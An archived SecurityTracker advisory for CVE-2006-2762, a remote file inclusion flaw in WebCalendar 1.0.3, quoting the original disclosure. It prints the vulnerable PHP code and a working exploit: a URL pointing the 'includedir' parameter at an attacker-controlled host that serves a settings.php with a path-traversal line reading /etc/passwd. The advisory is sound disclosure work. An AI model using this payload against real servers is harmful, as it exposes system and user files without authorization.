SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Calendar)  >   WebCalendar Vendors:   Knudsen, Craig
WebCalendar Include File Bug in 'includes/config.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016179
SecurityTracker URL:  http://securitytracker.com/id/1016179
CVE Reference:   CVE-2006-2762   (Links to External Site)
Updated:  Aug 25 2009
Original Entry Date:  May 30 2006
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 1.0.3
Description:   A vulnerability was reported in WebCalendar. A remote user can view arbitrary files on the target system.

The 'includes/config.php' script does not properly validate user-supplied input in the 'includedir' parameter. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include files from a remote system which will be able to include files from the target system. As a result, the remote user can view arbitrary files with the privileges of the target web service.

Impact:   A remote user can view files on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.k5n.us/webcalendar.php (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  WebCalendar-1.0.3 reading of any files

Version:    WebCalendar-1.0.3


Type:       Reading of any files


Description:

-----------------------------

includes/config.php:

line  64


if ( ! empty ( $includedir ) ) 

  $fd = @fopen ( "$includedir/settings.php", "rb", true );


......


while ( ! feof ( $fd ) ) {

  $data .= fgets ( $fd, 4096 );

}


$configLines = explode ( "\n", $data );


for ( $n = 0; $n < count ( $configLines ); $n++ ) {

......

    $settings[$matches[1]] = $matches[2];

......


$user_inc = $settings['user_inc'];

......


includes/init.php

include_once "includes/$user_inc";


Example:

---------------------------------------

index.php?includedir=http://attacker_host

where in attacker_host exists file settings.php , which content


"

<?php


    echo '<?php

# updated via install/index.php on Wed, 24 May 2006 09:29:55 +0300

Unimportant variables can be taken from original settings.php

user_inc: ../../../../../../../../../../../../../../../../etc/passwd

# end settings.php

?>';


?> 

"


Requirements

register_globals = On;

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC